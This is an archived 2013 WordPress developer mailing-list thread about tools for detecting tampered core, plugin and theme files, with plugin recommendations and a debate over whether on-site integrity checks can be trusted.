A tool to check whether the core files were tampered?

Discussion:

Davit Barbakadze

2013-11-15 12:36:26 UTC

Hi. Do you guys have a tool to check whether the core files were
tampered? Like a plugin that you install on the WordPress site and it
checks all the core files, plugins and themes (taking into account the
versions) and outputs in a user-friendly way in the backend?

That might be something of immense help to an average dev.

I've found this one: http://wordpress.org/plugins/hashchecker/, but it
seems to be checking only WordPress files. I imagine something doing
similar to plugins and themes. Also this one seems to be abandoned for
a couple of years already.

Davit Barbakadze

Simon Weil

2013-11-15 12:41:09 UTC

Permalink

try wordfence it's good for core and plugins:
http://wordpress.org/plugins/wordfence/

Post by Davit Barbakadze
Hi. Do you guys have a tool to check whether the core files were
tampered? Like a plugin that you install on the WordPress site and it
checks all the core files, plugins and themes (taking into account the
versions) and outputs in a user-friendly way in the backend?
That might be something of immense help to an average dev.
I've found this one: http://wordpress.org/plugins/hashchecker/, but it
seems to be checking only WordPress files. I imagine something doing
similar to plugins and themes. Also this one seems to be abandoned for
a couple of years already.
Davit Barbakadze
_______________________________________________
wp-hackers mailing list
http://lists.automattic.com/mailman/listinfo/wp-hackers

Stephen Harris

2013-11-15 12:42:36 UTC

Permalink

I use "WordPress File Monitor Plus" (
http://wordpress.org/plugins/wordpress-file-monitor-plus/). This
provides an list of changed files (and optionally gives you email
alert), and it looks in the plug-in/theme directories too.

But it does a slightly different job than hashchecker - that is, it
detects changes in the local files rather than comparing local files to
the released ones. So perhaps it isn't quite what you're after.

Stephen Harris

Davit Barbakadze

2013-11-15 13:50:41 UTC

Permalink

wordfence seems to be a perfect solution for the task and useful
plugin in general.

Thanks guys and Simon in particular :)
Davit Barbakadze

On Fri, Nov 15, 2013 at 4:42 PM, Stephen Harris

Post by Stephen Harris
I use "WordPress File Monitor Plus" (
http://wordpress.org/plugins/wordpress-file-monitor-plus/). This provides an
list of changed files (and optionally gives you email alert), and it looks
in the plug-in/theme directories too.
But it does a slightly different job than hashchecker - that is, it detects
changes in the local files rather than comparing local files to the released
ones. So perhaps it isn't quite what you're after.
Stephen Harris

_______________________________________________
wp-hackers mailing list
http://lists.automattic.com/mailman/listinfo/wp-hackers

Simon Weil

2013-11-15 13:54:37 UTC

Permalink

Glad to have helped :)
By the way, I use it together with "Better Wordpress Security" that among
many other features also sends me an email for every file change - security
wise it is very useful.

Post by Davit Barbakadze
wordfence seems to be a perfect solution for the task and useful
plugin in general.
Thanks guys and Simon in particular :)
Davit Barbakadze
On Fri, Nov 15, 2013 at 4:42 PM, Stephen Harris

Post by Stephen Harris
I use "WordPress File Monitor Plus" (
http://wordpress.org/plugins/wordpress-file-monitor-plus/). This

provides an

Post by Stephen Harris
list of changed files (and optionally gives you email alert), and it

looks

Post by Stephen Harris
in the plug-in/theme directories too.
But it does a slightly different job than hashchecker - that is, it

detects

Post by Stephen Harris
changes in the local files rather than comparing local files to the

released

Post by Stephen Harris
ones. So perhaps it isn't quite what you're after.
Stephen Harris

_______________________________________________
wp-hackers mailing list
http://lists.automattic.com/mailman/listinfo/wp-hackers

David Anderson

2013-11-15 16:42:33 UTC

Permalink

Hi,

Since I sell a solution in this area, I'm biased...

... but, as a long-time security pro, I'd say that a plugin which offers
to check that your website hasn't been tampered with fails at the
conceptual level. Useless. It's only good as long as you're sure that
the plugin itself is intact. Altering the plugin is trivially easy (e.g.
1 line to short-circuit the tamper check, and 'return true;'). It's like
asking your young son "you would tell me if you were lying, wouldn't
you?". "Yeah dad, sure". "Thanks - I was almost worried for a moment there."

Why would someone who tampers with your website *not* tamper with the
security check? Basically, you're relying on the hacker being
incompetent. Wordfence (for example), has had over 1 million downloads.
Why would someone trying to break into WordPress sites have to be to not
have "short-circuit WordFence's tamper checks" in his toolkit?

Unless you're happy assuming that hackers will continue ignoring
WordFence (etc.) so that their hacks can get cleaned up quicker, then
the only way to verify your files is off-site, i.e. externally. Anything
(not just a plugin) that you run within the same web-space could itself
be tampered with. A service which has pristine versions of your plugins,
and can compare them in a 'clean room' with what's installed. <Advert>I
do this with my own tool (from the command line: "wordshell all
--everything --checkmodifications"). It avoids this issue because it
does not run any code on the webserver for that operation</Advert>. I'm
sure there must be other functional solutions as well.

Best wishes,
David

--
WordShell - WordPress fast from the CLI - www.wordshell.net

J.D. Grimes

2013-11-15 17:07:27 UTC

Permalink

Post by David Anderson
Hi,
Since I sell a solution in this area, I'm biased...
... but, as a long-time security pro, I'd say that a plugin which offers to check that your website hasn't been tampered with fails at the conceptual level. Useless. It's only good as long as you're sure that the plugin itself is intact. Altering the plugin is trivially easy (e.g. 1 line to short-circuit the tamper check, and 'return true;'). It's like asking your young son "you would tell me if you were lying, wouldn't you?". "Yeah dad, sure". "Thanks - I was almost worried for a moment there."
Why would someone who tampers with your website *not* tamper with the security check? Basically, you're relying on the hacker being incompetent. Wordfence (for example), has had over 1 million downloads. Why would someone trying to break into WordPress sites have to be to not have "short-circuit WordFence's tamper checks" in his toolkit?
Unless you're happy assuming that hackers will continue ignoring WordFence (etc.) so that their hacks can get cleaned up quicker, then the only way to verify your files is off-site, i.e. externally. Anything (not just a plugin) that you run within the same web-space could itself be tampered with. A service which has pristine versions of your plugins, and can compare them in a 'clean room' with what's installed. <Advert>I do this with my own tool (from the command line: "wordshell all --everything --checkmodifications"). It avoids this issue because it does not run any code on the webserver for that operation</Advert>. I'm sure there must be other functional solutions as well.
Best wishes,
David

Agreed that its usefulness in that regard is limited. But it is more useful in this case, when checking if a site has been previously tampered with before the plugin was installed.

Mika A Epstein

2013-11-15 18:10:49 UTC

Permalink

Given the nature of most 'tampering' is to add in obfuscated code, I
just search for that. Or if I even remotely suspect it, delete core and
plugins, reinstall. it's not like it hurts my data.

It'd be nice if someone made a wp-cli-esque sort of scanner for this,
though, since in theory if that was baked in, they couldn't mess with
the scanner unless they had access to edit wp-cli (i.e. SU or root)